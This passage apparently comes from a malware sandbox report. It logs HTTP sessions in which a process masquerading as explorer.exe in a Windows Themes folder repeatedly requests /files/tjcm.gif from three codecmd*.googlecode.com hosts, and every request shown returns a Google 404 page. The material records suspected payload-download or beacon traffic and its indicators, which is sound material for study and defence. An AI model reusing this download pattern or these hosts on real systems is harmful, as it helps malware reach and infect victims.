                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:43.874216080 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      141192.168.2.54985574.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:44.341311932 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:44.997317076 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:44 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:44.997574091 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      142192.168.2.549856108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:45.690820932 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:46.352853060 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:46 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:46.352874041 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      143192.168.2.549857108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:46.741307974 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:47.450639009 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:47 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:47.450664043 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      144192.168.2.54985874.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:48.417309999 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:49.122246027 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:49 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:49.122339964 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      145192.168.2.549859108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:49.609040022 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:50.289499044 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:50 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:50.289519072 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      146192.168.2.549860108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:50.724131107 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:51.522437096 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:51 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:51.522553921 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:16:51.522564888 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      147192.168.2.54986174.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:51.967158079 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
